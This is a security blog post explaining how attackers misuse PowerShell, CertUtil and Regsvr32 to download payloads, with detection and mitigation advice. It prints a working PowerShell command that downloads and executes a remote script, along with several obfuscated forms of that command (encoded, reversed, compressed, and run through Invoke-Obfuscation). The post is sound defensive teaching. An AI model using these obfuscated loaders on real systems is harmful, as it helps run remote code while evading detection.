Living off the land: the exploitation phase

This is the fourth blog post in a series discussing Living Off the Land tools and techniques. Successful exploitation could allow an adversary to escalate privilege, obtain sensitive information or download additional software.

In this blog post we will focus on tools that can be exploited to download additional payloads.

Summary

Living Off the Land tools for exploitation are popular amongst both sophisticated and unsophisticated adversaries. Their use reduces the likelihood of detection and may increase the required investigation time.

In relation to Living Off the Land tools, the exploitation phase encapsulates a massive number of attack methods. For the sake of brevity, this blog post focuses on three tools in particular: PowerShell, CertUtil and Regsvr32.

Unless appropriate steps are taken to both prevent and detect these threats, adversaries will continue exploiting these and similar tools to perform a plethora of malicious activity.

Background

Exploitation is admittedly a broad topic. Two of the most commonly exploited programs that are used to retrieve additional payloads are PowerShell and CertUtil.

PowerShell is a scripting language designed for task automation and configuration management; this tool is extremely flexible and was discussed at length in the first installment of this series, Living Off the Land – The Reconnaissance Phase ¹. In the context of exploitation, PowerShell obfuscation is heavily utilized in order to bypass and circumvent detection methods. It increases the difficulty for incident responders to quickly identify the purpose of the specific command.

CertUtil is a Windows program used to download and update certificates ². In the past, adversaries have exploited CertUtil to download additional payloads after enticing users to open weaponized documents.

In 2016, a post exploitation technique was released that exploited the use of regsvr32.exe to download and execute remote files. It was dubbed ‘Squiblydoo’ and was used to bypass App Locker and other application whitelisting software. Today Squiblydoo is blocked by default using Windows 10 Home Defender but is still allowed on some versions of Windows 7.

This is by no means an exhaustive list. A more comprehensive list of Living Off the Land Tools has been made available on GitHub through various security researchers ³.

Additional Information

PowerShell – Obfuscation

PowerShell is able to interpret commands that have been obfuscated to evade detection by security products and incident responders. In the below example we demonstrate a variety of obfuscation techniques adversaries have often employed. In these examples the PowerShell command will download a file from the internet and execute it.

Un-obfuscated PowerShell Command

<span>powershell</span> <span>-c</span> <span>"mkdir C:\Temp; (new-object System.Net.WebClient).DownloadFile('\\192.168.0.115\Sharing\test2.ps1','C:\Temp\evil2.ps1'); powershell -f C:\Temp\evil2.ps1"</span>

Obfuscation Techniques:

Obfuscating All Tokens

<span>.(</span><span>"{1}{0}{3}{2}"</span><span>-f</span> <span>'owers'</span><span>,</span><span>'p'</span><span>,</span><span>'l'</span><span>,</span><span>'hel'</span><span>)</span> <span>-c</span> <span>(((</span><span>"{33}{31}{34}{16}{29}{17}{32}{6}{11}{27}{35}{7}{26}{20}{39}{12}{0}{13}{8}{10}{25}{22}{3}{23}{2}{15}{36}{18}{24}{28}{37}{21}{5}{9}{14}{30}{1}{38}{19}{4}"</span> <span>-f</span> <span>'dFile'</span><span>,</span><span>'te'</span><span>,</span><span>'ZRQTe'</span><span>,</span><span>'Bbn,B'</span><span>,</span><span>'1'</span><span>,</span><span>'ower'</span><span>,</span><span>'s'</span><span>,</span><span>'ient'</span><span>,</span><span>'R'</span><span>,</span><span>'she'</span><span>,</span><span>'QZRQ19'</span><span>,</span><span>'tem.'</span><span>,</span><span>'oa'</span><span>,</span><span>'(BbnZ'</span><span>,</span><span>'ll -f C'</span><span>,</span><span>'mp'</span><span>,</span><span>':'</span><span>,</span><span>'mp; '</span><span>,</span><span>'es'</span><span>,</span><span>'s'</span><span>,</span><span>'.Do'</span><span>,</span><span>'s1Bbn); p'</span><span>,</span><span>'aringZRQtest2.ps1'</span><span>,</span><span>'bnC:'</span><span>,</span><span>'t'</span><span>,</span><span>'2.168.0.115ZRQSh'</span><span>,</span><span>')'</span><span>,</span><span>'Net.We'</span><span>,</span><span>'2'</span><span>,</span><span>'ZRQTe'</span><span>,</span><span>':ZRQTempZRQ'</span><span>,</span><span>'k'</span><span>,</span><span>'(new-object Sy'</span><span>,</span><span>'m'</span><span>,</span><span>'dir C'</span><span>,</span><span>'bCl'</span><span>,</span><span>'ZRQt'</span><span>,</span><span>'.p'</span><span>,</span><span>'st2.p'</span><span>,</span><span>'wnl'</span><span>)).</span><span>"Rep`laCE"</span><span>((</span><span>[CHAR]</span><span>90+</span><span>[CHAR]</span><span>82+</span><span>[CHAR]</span><span>81),</span><span>[StRiNg][CHAR]</span><span>92).</span><span>"r`ePL`ACe"</span><span>((</span><span>[CHAR]</span><span>66+</span><span>[CHAR]</span><span>98+</span><span>[CHAR]</span><span>110),</span><span>[StRiNg][CHAR]</span><span>39))</span>

Encoded as Special Characters

<span>${]]]]]]]]]]]]}</span> <span>=+</span> <span>$()</span> <span>;</span><span>${]]]]]]}</span> <span>=</span> <span>${]]]]]]]]]]]]}</span><span>;</span><span>${]]]]}</span> <span>=++</span> <span>${]]]]]]]]]]]]}</span> <span>;</span> <span>${]}=++</span> <span>${]]]]]]]]]]]]}</span><span>;</span> <span>${]]]]]]]}=</span> <span>++${]]]]]]]]]]]]}</span> <span>;</span><span>${]]}=++${]]]]]]]]]]]]}</span> <span>;</span> <span>${]]]]]]]]]]]}=++</span> <span>${]]]]]]]]]]]]}</span> <span>;</span> <span>${]]]}</span> <span>=++</span> <span>${]]]]]]]]]]]]}</span> <span>;</span><span>${]]]]]}</span> <span>=++${]]]]]]]]]]]]}</span> <span>;</span><span>${]]]]]]]]}</span> <span>=</span> <span>++</span> <span>${]]]]]]]]]]]]}</span> <span>;</span> <span>${]]]]]]]]]}</span> <span>=</span> <span>++${]]]]]]]]]]]]}</span> <span>;</span> <span>${]]]]]]]]]]}</span> <span>=</span><span>"["</span><span>+</span> <span>"$(@{ }) "</span><span>[</span> <span>${]]]]]}]+</span><span>"$(@{ })"</span><span>[</span> <span>"${]]]]}${]]]]]]]]]}"</span><span>]+</span><span>"$( @{} ) "</span><span>[</span> <span>"${]}${]]]]]]}"</span> <span>]</span> <span>+</span><span>"$? "</span><span>[</span> <span>${]]]]}]+</span> <span>"]"</span> <span>;</span><span>${]]]]]]]]]]]]}=</span><span>""</span><span>.(</span><span>"$(@{ })"</span><span>[</span> <span>"${]]]]}"</span><span>+</span><span>"${]]}"</span><span>]+</span> <span>"$( @{} )"</span><span>[</span> <span>"${]]]]}"</span> <span>+</span> <span>"${]]]}"</span><span>]</span> <span>+</span><span>"$( @{} ) "</span><span>[${]]]]]]}</span> <span>]</span> <span>+</span><span>"$( @{ } ) "</span><span>[${]]}</span> <span>]+</span><span>"$?"</span><span>[</span> <span>${]]]]}]</span> <span>+</span><span>"$(@{ })"</span><span>[${]]]]]]]}])</span> <span>;</span> <span>${]]]]]]]]]]]]}=</span><span>"$(@{ } ) "</span><span>[</span><span>"${]]]]}"</span><span>+</span> <span>"${]]}"</span><span>]</span> <span>+</span><span>"$(@{})"</span><span>[${]]}]+</span><span>"${]]]]]]]]]]]]}"</span><span>[</span> <span>"${]}"</span> <span>+</span> <span>"${]]]]]}"</span> <span>]</span> <span>;</span> <span>"${]]]]]]]]]]}${]]]]}${]]]]}${]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]}+${]]]]]]]]]]}${]]]]]]]}${]}+ ${]]]]]]]]]]}${]]}${]]]]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]}${]} +${]]]]]]]]]]}${]]]]]]]}${]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]} +${]]]]]]]]]]}${]]]]]]]}${]}+${]]]]]]]]]]}${]]]}${]]]]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]]}+ ${]]]]]]]]]]}${]]]]]]]]]}${]} + ${]]]]]]]]]]}${]]]]]]]]}${]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]}${]}+ ${]]]]]]]]]]}${]]}${]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]} + ${]]]]]]]]]]}${]]}${]]]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]}+${]]]]]]]]]]}${]]]]]]]]]}${]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+${]]]]]]]]]]}${]]]]]]]}${]} + ${]]]]]]]]]]}${]]]]]]]]}${]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]}${]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]}+ ${]]]]]]]]]]}${]]}${]]]}+ ${]]]]]]]]]]}${]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]]} + ${]]]]]]]]]]}${]]}${]]]} +${]]]]]]]]]]}${]]]]]]]]}${]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]}+ ${]]]]]]]]]]}${]]]]]]]]]}${]]]]]]]]} +${]]]]]]]]]]}${]]]}${]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+${]]]]]]]]]]}${]]}${]]]]}+ ${]]]]]]]]]]}${]]}${]]]}+${]]]]]]]]]]}${]]]}${]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]}+ ${]]]]]]]]]]}${]]]]]]]]]}${]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]}+${]]]]]]]]]]}${]]]]]}${]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]}${]]]]]]} + ${]]]]]]]]]]}${]]]]]]]}${]]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]]]}${]} +${]]]]]]]]]]}${]]]]]]]]]}${]} + ${]]]]]]]]]]}${]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]} +${]]]]]]]]]]}${]]}${]]]} +${]]]]]]]]]]}${]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]}+ ${]]]]]]]]]]}${]]}${]]]}+ ${]]]]]]]]]]}${]]}${]]]]]]]]}+${]]]]]]]]]]}${]]}${]]]}+${]]]]]]]]]]}${]]}${]]]]]]]]]}+${]]]]]]]]]]}${]]}${]]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]} +${]]]]]]]]]]}${]]]]]]]]]}${]}+ ${]]]]]]]]]]}${]]]]]]]]}${]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]}+${]]]]]]]]]]}${]]]]]]]]]}${]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]}+ ${]]]]]]]]]]}${]]]]]]]]]}${]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]} + ${]]]]]]]]]]}${]]}${]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]} +${]]]]]]]]]]}${]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]}${]]]]]]]]]}+ ${]]]]]]]]]]}${]]}${]]}+ ${]]]]]]]]]]}${]]]]]]]}${]]]]]]]]]}+ ${]]]]]]]]]]}${]]]}${]]]]]}+ ${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]]]}${]}+ ${]]]]]]]]]]}${]]]]]]]]}${]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]}+${]]]]]]]]]]}${]]]]]]]]]}${]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]}+${]]]]]]]]]]}${]]}${]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]} +${]]]]]]]]]]}${]]}${]]]]]]]]]}+${]]]]]]]]]]}${]]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]}${]]]]}+${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]}${]}+${]]]]]]]]]]}${]]]]}${]]]]}${]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]}+${]]]]]]]]]]}${]]]]]]]}${]} +${]]]]]]]]]]}${]]}${]]]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]}+${]]]]]]]]]]}${]]]]]]]}${]}+${]]]]]]]]]]}${]]]}${]]]]]}+${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]]]}${]} +${]]]]]]]]]]}${]]]]]]]]}${]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]} +${]]]]]]]]]]}${]]]]]]]]]}${]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]}+ ${]]]]]]]]]]}${]]}${]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]} + ${]]]]]]]]]]}${]]}${]]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]}${]]} | ${]]]]]]]]]]]]} "</span><span>|&${]]]]]]]]]]]]}</span>

Reverse Command after Concatenating

<span>sv</span> <span>(</span><span>'n'</span><span>+</span><span>'209t'</span><span>+</span><span>'e'</span><span>)</span> <span>(</span><span>[cHAr[]]</span><span>" ))93]RAHc[]GnirTs[,'JPW'(ECalPeR.)29]RAHc[]GnirTs[,'k2B'(ECalPeR.)43]RAHc[]GnirTs[,)37]RAHc[+56]RAHc[+57]RAHc[((ECalPeR.)'IA'+'K'+'1'+'sp.2tsetk2Bpm'+'eTk'+'2B:C '+'f- llehsr'+'ewop ;)JPW1s'+'p.2t'+'set'+'k'+'2Bpm'+'eTk2B:'+'C'+'JP'+'W,J'+'PW1sp.2'+'t'+'s'+'e'+'tk2Bgni'+'rah'+'S'+'k2B511'+'.0.86'+'1.291k2Bk2BJPW(eliF'+'daolnwoD.)t'+'neil'+'Cb'+'eW.t'+'eN.metsy'+'S tcej'+'bo-'+'wen( ;'+'pmeTk2B:C rid'+'kmIAK c- lle'+'h'+'sre'+'wop'( ()'X'+]03[EMOHsp$+]4[emoHSp$ ( ."</span><span>)</span><span>;</span> <span>[ARrAY]</span><span>::</span><span>ReveRSE(</span><span>$N209te</span><span>)</span> <span>;</span> <span>IEX(</span> <span>-Join</span><span>$N209te</span><span>)</span>

Compression

<span>INvoKE-EXprEssIon</span><span>(</span><span>nEW-oBjECt</span> <span>sYSTEM.iO.stREAMReAder((</span><span>nEW-oBjECt</span> <span>sYsteM.iO.CompREssioN.deFLAtesTReAm(</span><span>[sySTeM.iO.MeMOrYSTreAm] [SYSteM.convErT]</span><span>::</span><span>FromBaSe64sTRInG(</span> <span>'7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8iVtVVXjfzvCzT7Wn60eLtrKjTk0e/75t8sTpMt5b51XY1+el82qavr5s2X4xf5O34u/nkpCzyZXtn/LS6WpZVNntWlPnWx7/v77v7cG+8++nBeGe8u3v/9309z+piefH7tnnT7o1Xze7Ho48VuPfZncPUR+Pc9O+afPT/AA=='</span><span>),</span> <span>[iO.cOMPRESsION.cOmPrEssIOnModE]</span><span>::</span><span>Decompress</span> <span>)</span> <span>),</span><span>[sYStEm.TeXT.ENcoDInG]</span><span>::</span><span>AScIi)).reaDTOEND(</span> <span>)</span>

The PowerShell script ‘Invoke-Obfuscation’ has been created to automate the obfuscation process ⁴. Invoke-Obfuscation allows the user to conceal a PowerShell command’s true purpose using a list of pre-defined obfuscation techniques.

The example below shows how difficult it is for an incident responder to determine what the PowerShell command is doing after Invoke-Obfuscation has been applied.

Initial PowerShell Command:

<span>powershell</span> <span>-c</span> <span>"mkdir C:\Temp; (new-object System.Net.WebClient).DownloadFile('\\192.168.0.115\Sharing\test2.ps1','C:\Temp\evil2.ps1'); powershell -f C:\Temp\evil2.ps1"</span>

Obfuscated PowerShell Command:

<span>neW-OBjEcT</span> <span>iO.ComPressIOn.dEFlaTEStREAM(</span> <span>[systEM.Io.mEmORystREam] [cOnVert]</span><span>::</span><span>FrOmBase64StRINg(</span><span>'7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0l+Ybm19/pPpx99aPK2/9fGd8Yvjxen37o12d0d739/+TnW2/PjjO+lWuvXx6uNPPq6u8rqZ0y85/b8s0236MU3pH2rwVX29oN/e0v9nBf1T0//Tk0e/N/34Cn9ep59Qk+989QavL+hX/Lk6RKst+meZX21Xk5/Op1+hZfqVQrim/7do8/q6afEVfqev62sGM+bW6IIbv8jxt35w3Zov01S+HtM/38V7kxPgDyzxAhBZtnfor7HATdHLJ/wvffD0Ywx8WdpePtEvKvqRYbj0/2cAVuZbl2Xze38HX//e3/lq9+GeeUH736V/Pz0AGjuCqPYhXwqZDMLXaHyf/v97uzFxg+989XpuKMrkoO8zgChsk08EJP1/eUGICNk+MWT4CgTNXW/0fdPujVfN7iUG2YwuS2mY2lca+ofm8it9QfDAb4qIJTP6lBleYea/81VrUdU5o67oB2iwkqlWalLv/Df947p3vd+xHMFdUavDlFnSDpVfveIJxdfEqDmxKH2xfc5d+JjS9yePdLKV2a6JUG8MVdBAR8CjNC0tHPqnzZVqPD93MKJXp/TPy+fZNN9iYhBI+ndk3/q9nhwIunfGr06l3db3pvNjvPr9XUz4gSKIT+kj+nXnQHjefUq/7e7epy5H32swlYB4trz4/vfo55T+r/Don3sP0zt3SKjr05dldoLOTr59XH//wf1P5JdPP9Vf7n96Z/Tx79tveWBa7u7um9/2dqnj12/qs+Xn35eP7j28c+f/AQ=='</span> <span>),</span> <span>[Io.cOmPRESSIon.cOMpReSsionMoDe]</span><span>::</span><span>DEComPReSs</span> <span>)|</span><span>FoREACh</span><span>{</span><span>neW-OBjEcT</span> <span>SystEm.IO.sTreAmrEadEr(</span> <span>$_</span><span>,</span><span>[Text.eNCoDing]</span><span>::</span><span>aSCii)</span> <span>}|</span> <span>fOREAch</span><span>{</span> <span>$_</span><span>.rEaDtOend()}</span> <span>)</span> <span>|&(</span> <span>$pSHOMe</span><span>[21]+</span><span>$PShomE</span><span>[34]+</span><span>'x'</span><span>)</span>

The above PowerShell command was obfuscated via command token obfuscation, using the “string” and “whitespace” options, concatenating the entire command and then compressing it. The result is a command that is unrecognizable to human eyes but can still be immediately executed by PowerShell.

CertUtil

CertUtil has been exploited by adversaries to circumvent security products in order to download payloads. As recently as March 2018, CertUtil has been used in the wild in targeted attacks; the technique has been added into the Sanny malware family to download encrypted BAT files ⁵.

In the example below you can see a base64 encoded file being downloaded from a webserver. Once it has been decoded it can be executed by another program.

Regsvr32

Adversaries can still use Regsvr32.exe on some versions of Windows 7 to download and execute files.

The example below shows the ability to download and execute JavaScript embedded inside payload.scr.

Figure 2: Regsvr32 executing JavaScript

Recommendations

There are both broad and specific steps to help defend against the tools discussed in this blog post. Ensuring that employees are aware of ongoing threats and giving them the training to deal with potentially hostile situations strengthens the last line of defence.

The risks associated with Regsvr32 can be minimized by adding firewall rules to deny connections initiated by the Regsvr32.exe process. Process monitoring can also be employed to quickly identify the unusual command-line arguments, modified files or network connection that an adversary may make using CertUtil and Regsvr32 ⁶.

As discussed in previous blog posts enabling PowerShell logging can help identify encoded PowerShell commands and record unusual behavior performed by adversaries ⁷.

Conclusion

In conclusion, Living Off the Land tools are actively being used by adversaries to complete the exploitation stage of their attacks. This minimizes the chances of detection, lessening the time for incident responders to identify and remediate the issue. The ease and effectiveness of the Living Off the Land exploitation tools discussed in this blog makes it clear why adversaries are frequently employing these and similar tools. Using the mitigation strategies listed above will help companies to discover and quickly remediate a wide variety of attacks.

In the next and final blog post in this series, the focus is on the Living Off the Land tools used in stage six of the Cyber Kill Chain, Command and Control.

Sources

[1] https://www.esentire.com/blog/living-off-the-land-the-reconnaissance-phase/

[2] https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

[3] https://github.com/api0cradle/LOLBAS

[4] https://github.com/danielbohannon/Invoke-Obfuscation

[5] https://threatpost.com/sanny-malware-updates-delivery-method/130803/

[6] https://attack.mitre.org/wiki/Technique/T1117

[7] https://blogs.technet.microsoft.com/ashleymcglone/2017/03/29/practical-powershell-security-enable-auditing-and-logging-with-dsc/